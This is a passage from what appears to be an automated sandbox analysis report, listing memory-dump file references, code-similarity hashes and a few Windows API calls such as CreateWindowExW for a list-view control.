                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                    • String ID: csm
                                    • API String ID: 803148776-1018135373
                                    • Opcode ID: e3664caf934b3eefaaa5df4d7cacef43b1cf49a14ce4952649e901bdecbea5d6
                                    • Instruction ID: 69b6639a9ef3a36a169a6a5565f12a55bffb05f741e2618f410494396190d148
                                    • Opcode Fuzzy Hash: e3664caf934b3eefaaa5df4d7cacef43b1cf49a14ce4952649e901bdecbea5d6
                                    • Instruction Fuzzy Hash: 80014B348002058FCF34DF26D6406EEB3B5AF20311F14462FE44496359DBB89AE6EF49
                                    APIs
                                    • InitCommonControlsEx.COMCTL32 ref: 0040E7BF
                                    • CreateWindowExW.USER32(00000000,SysListView32,00419450,50010201,0000000A,00000028,00000190,000001F4,?,00000000,00000000,00000000), ref: 0040E7F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: CommonControlsCreateInitWindow
                                    • String ID: SysListView32
                                    • API String ID: 2646078016-78025650
                                    • Opcode ID: f7c3c60ebf2b29c8cd91b1213f0e9bf28fa0210beb0f04a3fb4def70d8a6e988
                                    • Instruction ID: f3d3e535e189fff61838196dd880c7fe0caa92239aab9ee536b101cdf5704626
                                    • Opcode Fuzzy Hash: f7c3c60ebf2b29c8cd91b1213f0e9bf28fa0210beb0f04a3fb4def70d8a6e988
                                    • Instruction Fuzzy Hash: 99E04F747843007FF6509B40DC5BF963764A788F05F50C024F649A51C0D6F46885866A